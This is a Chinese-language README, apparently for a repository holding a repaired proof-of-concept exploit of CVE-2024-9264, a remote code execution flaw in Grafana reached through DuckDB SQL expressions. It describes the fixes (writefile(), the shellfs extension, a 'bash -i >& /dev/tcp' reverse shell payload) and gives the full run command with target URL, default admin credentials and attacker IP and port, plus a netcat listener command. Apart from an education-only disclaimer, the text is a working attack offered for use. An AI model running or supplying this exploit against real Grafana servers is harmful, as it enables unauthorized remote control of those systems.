
CVE-2024-9264的修复版概念验证漏洞利用,通过DuckDB SQL表达式实现Grafana严重远程代码执行。利用修正后的shellfs扩展和writefile()函数执行反弹shell。
这是一个针对 CVE-2024-9264 的 PoC(概念验证)漏洞利用的 已修复版本,该漏洞是 Grafana 中的一个严重远程代码执行漏洞(通过 SQL 表达式和 DuckDB)。
🔗 原始公告:Grafana Security Release
❌ 原始 PoC:因语法错误和 write_file() 使用不当而失效
✅ 此版本有效,已在一个存在漏洞的 Grafana 11.0.0 实例上测试。
writefile() 替代 write_file()(DuckDB 函数)bash -i >& /dev/tcp/... 的正确 shell 负载shellfs 扩展成功写入并执行反向 shellinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
然后使用以下命令监听:
nc -lvnp 4444
本项目仅供教育目的。
请勿将其用于未经授权测试的目标。
由 Exerr 修改并验证 — 原始 PoC 由 z3k0sec 编写。